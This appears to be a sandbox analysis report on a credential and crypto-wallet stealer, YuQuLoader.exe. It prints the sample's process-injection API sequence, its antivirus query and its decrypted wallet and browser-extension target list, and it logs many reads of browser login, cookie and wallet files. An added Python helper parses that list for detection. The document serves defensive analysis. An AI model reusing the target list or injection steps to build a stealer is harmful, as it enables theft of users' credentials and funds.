                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: 0_2_00B261B4 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_00B261B4
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Memory written: C:\Users\user\Desktop\YuQuLoader.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Process created: C:\Users\user\Desktop\YuQuLoader.exe "C:\Users\user\Desktop\YuQuLoader.exe"
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: GetLocaleInfoW,0_2_00B0F0C6
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: EnumSystemLocalesW,0_2_00B0F067
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: EnumSystemLocalesW,0_2_00B0F19B
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: GetLocaleInfoW,0_2_00B0F1E6
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00B0F28D
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: EnumSystemLocalesW,0_2_00B0AAE7
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: GetLocaleInfoW,0_2_00B0F393
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00B0EB28
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: GetLocaleInfoW,0_2_00B0A5EC
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: EnumSystemLocalesW,0_2_00B0ED79
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00B0EE14
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: GetLocaleInfoW,2_2_00B0F0C6
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: EnumSystemLocalesW,2_2_00B0F067
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: EnumSystemLocalesW,2_2_00B0F19B
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: GetLocaleInfoW,2_2_00B0F1E6
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_00B0F28D
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: EnumSystemLocalesW,2_2_00B0AAE7
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: GetLocaleInfoW,2_2_00B0F393
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_00B0EB28
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: GetLocaleInfoW,2_2_00B0A5EC
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: EnumSystemLocalesW,2_2_00B0ED79
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_00B0EE14
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: 0_2_00AFE1B7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00AFE1B7
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: Amcache.hve.5.dr; Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.5.dr; Binary or memory string: msmpeng.exe
                Source: Amcache.hve.5.dr; Binary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: YuQuLoader.exe, 00000002.00000003.1589161023.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.2281775976.00000000015C3000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1651675961.00000000015C3000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1589579772.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1589161023.00000000015C3000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1651675961.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000002.2618150185.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1589446063.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1681524125.00000000015C3000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1652000979.00000000015DB000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.5.dr; Binary or memory string: MsMpEng.exe
                Source: C:\Users\user\Desktop\YuQuLoader.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 2.2.YuQuLoader.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.YuQuLoader.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2617683051.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1444774555.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: YuQuLoader.exe, 00000002.00000003.1557228002.0000000001640000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: :"klnaejjgbibmhlephnhpmaofohgkpgkd","ez":"ZilPay"},{"en":"aeachknmefphepccionboohckonoeemg","ez":"Coin98"},{"en":"bhghoamapcdpbohphigoooaddinpkbai","ez":"Authenticator","ses":true},{"en":"dkdedlpgdmmkkfjabffeganieamfklkm","ez":"Cyano"},{"en":"nlgbhdfgdhgbiamfdfmbikcdghidoadd","ez":"Byone"},{"en":"infeboajgfhgbjpjbeppbkgnabfdkdaf","ez":"OneKey"},{"en":"cihmoadaighcejopammfbmddcmdekcje","ez":"Leaf"},{"en":"bhhhlbepdkbapadjdnnojkbgioiodbic","ez":"Solflare"},{"en":"mkpegjkblkkefacfnmkajcjmabijhclg","ez":"Magic Eden"},{"en":"aflkmfhebedbjioipglgcbcmnbpgliof","ez":"Backpack"},{"en":"gaedmjdfmmahhbjefcbgaolhhanlaolb","ez":"Authy"},{"en":"oeljdldpnmdbchonielidgobddfffla","ez":"EOS Authenticator","ses":true},{"en":"ilgcnhelpchnceeipipijaljkblbcob","ez":"GAuth Authenticator","ses":true},{"en":"imloifkgjagghnncjkhggdhalmcnfklk","ez":"Trezor Password Manager"},{"en":"bfnaelmomeimhlpmgjnjophhpkkoljpa","ez":"Phantom"},{"en":"ppbibelpcjmhbdihakflkdcoccbgbkpo","ez":"UniSat"},{"en":"cpojfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\atomic\\Local Storage\\leveldb","m":["*"],"z":"Wallets/Atomic","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Armory","m":["*.wallet"],"z":"Wallets/Armory","d":1,"fs":20971520},{"t":0,"p":"%localappdata%\\Coinomi\\Coinomi\\wallets","m":["*"],"z":"Wallets/Coinomi","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Authy Desktop\\Local Storage\\leveldb","m":["*"],"z":"Wallets/Authy Desktop","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":["*"],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"z":"Wallets/Guarda","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\DashCore\\wallets","m":["*.dat"],"z":"Wallets/DashCore","d":1,"fs":20971520},
                Source: YuQuLoader.exe, 00000002.00000003.1557228002.0000000001640000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: YuQuLoader.exe, 00000002.00000003.1557228002.0000000001640000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Exodus
                Source: YuQuLoader.exe, 00000002.00000003.1557228002.00000000015BB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: YuQuLoader.exe, 00000002.00000003.1557228002.0000000001640000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
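The wallet target list recovered from process memory above is a fragment of the stealer's decrypted configuration: one array of browser-extension entries ("en" = extension ID, "ez" = display name, "ses" = also look under Sync Extension Settings), an "mx" array for Mozilla add-ons, and a "c" array of desktop wallet rules ("p" = path with an environment placeholder, "m" = file masks, "z" = folder name in the exfiltration archive, "d" = recursion depth, "fs" = per-file size limit). Those field meanings are inferred from the strings on this page, not documented anywhere. The following Python is an added analysis helper, not code from the Joe Sandbox report or from the malware: it parses a constructed sample in the same shape, resolves the placeholders to the sandbox user's profile, and labels observed "File opened" paths with the wallet name from the config. Assumptions: the key naming the Chromium extension array is cut off in the dump, so it is called "ex" here; the sample config contains only a few entries copied from the string above; the observed paths are a handful copied from this report. One check the script makes visible: the three entries flagged "ses":true (Authenticator, EOS Authenticator, GAuth Authenticator) are exactly the three extension IDs this sample opened under Sync Extension Settings rather than only Local Extension Settings.

```python
"""Parse a LummaC-style wallet target list and label observed file opens.

Added example; field meanings are inferred from the memory strings on the
report page, and the "ex" key is an assumption (it is cut off in the dump).
"""
import fnmatch
import json
import ntpath
import re

# Constructed sample in the shape of the memory string. Extension and "c"
# entries are copied from that string; this is not the complete config.
SAMPLE_CONFIG = json.loads(r'''{
  "ex": [
    {"en": "bfnaelmomeimhlpmgjnjophhpkkoljpa", "ez": "Phantom"},
    {"en": "bhghoamapcdpbohphigoooaddinpkbai", "ez": "Authenticator", "ses": true},
    {"en": "ilgcnhelpchnceeipipijaljkblbcob", "ez": "GAuth Authenticator", "ses": true}
  ],
  "mx": [
    {"en": "webextension@metamask.io", "ez": "MetaMask"}
  ],
  "c": [
    {"t": 0, "p": "%appdata%\\Ethereum", "m": ["keystore"], "z": "Wallets/Ethereum", "d": 1, "fs": 20971520},
    {"t": 0, "p": "%appdata%\\Exodus\\exodus.wallet", "m": ["*"], "z": "Wallets/Exodus", "d": 0, "fs": 20971520},
    {"t": 0, "p": "%appdata%\\DashCore\\wallets", "m": ["*.dat"], "z": "Wallets/DashCore", "d": 1, "fs": 20971520}
  ]
}''')

# Profile locations of the sandbox user, taken from the "File opened" paths.
SANDBOX_ENV = {
    "appdata": r"C:\Users\user\AppData\Roaming",
    "localappdata": r"C:\Users\user\AppData\Local",
}
CHROME_USER_DATA = r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default"

_PLACEHOLDER = re.compile(r"%([A-Za-z_]+)%")
# Chromium extension IDs are 32 chars from a-p; a few IDs in the dump above
# are only 31 chars long, so the match is deliberately lenient.
_EXT_DIR = re.compile(r"\\(Local|Sync) Extension Settings\\([a-p]+)$")


def expand_placeholders(path, env):
    """Replace %appdata%-style placeholders (case-insensitive) using env."""
    def sub(m):
        key = m.group(1).lower()
        if key not in env:
            raise KeyError(f"no expansion for %{m.group(1)}%")
        return env[key]
    return _PLACEHOLDER.sub(sub, path)


def extension_dirs(config, user_data):
    """(name, directory) pairs the extension entries would enumerate.

    Entries with "ses": true get a second directory under Sync Extension
    Settings, matching the Sync Extension Settings opens in this report.
    """
    out = []
    for ext in config.get("ex", []):
        out.append((ext["ez"], ntpath.join(user_data, "Local Extension Settings", ext["en"])))
        if ext.get("ses"):
            out.append((ext["ez"], ntpath.join(user_data, "Sync Extension Settings", ext["en"])))
    return out


def wallet_targets(config, env):
    """Resolve the "c" (desktop wallet) entries into concrete collection rules."""
    return [
        {
            "path": expand_placeholders(entry["p"], env),
            "masks": entry["m"],
            "archive_dir": entry["z"],
            "max_depth": entry["d"],
            "max_bytes": entry["fs"],
        }
        for entry in config.get("c", [])
    ]


def matches_mask(filename, masks):
    """True if filename matches any mask from the config (shell wildcards)."""
    return any(fnmatch.fnmatch(filename.lower(), m.lower()) for m in masks)


def label_opens(config, opened_paths):
    """Map observed opens to (path, extension_id_or_None, name_or_None).

    Unknown extension IDs are still returned so they can be looked up by hand.
    """
    names = {ext["en"]: ext["ez"] for ext in config.get("ex", [])}
    labelled = []
    for p in opened_paths:
        m = _EXT_DIR.search(p)
        ext_id = m.group(2) if m else None
        labelled.append((p, ext_id, names.get(ext_id) if ext_id else None))
    return labelled


# Constructed from a few of the "File opened" lines in this report.
OBSERVED_OPENS = [
    CHROME_USER_DATA + r"\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa",
    CHROME_USER_DATA + r"\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai",
    CHROME_USER_DATA + r"\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn",
    CHROME_USER_DATA + r"\Login Data",
]

if __name__ == "__main__":
    for name, path in extension_dirs(SAMPLE_CONFIG, CHROME_USER_DATA):
        print(f"{name:20} {path}")
    for t in wallet_targets(SAMPLE_CONFIG, SANDBOX_ENV):
        print(t["archive_dir"], t["path"], t["masks"], t["max_depth"], t["max_bytes"])
    for path, ext_id, name in label_opens(SAMPLE_CONFIG, OBSERVED_OPENS):
        print(name or ("unknown extension" if ext_id else "browser database"), path)
```

Feed `label_opens` the full "File opened" list from a report and the full extension array from a decrypted config to get a per-wallet inventory of what the sample touched; IDs that come back unlabelled are the ones worth checking against the Chrome Web Store by hand. The `wallet_targets` output (path, masks, depth, size cap) is what to turn into file-access detections on endpoints where those wallets are actually installed.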
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                Source: C:\Users\user\Desktop\YuQuLoader.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
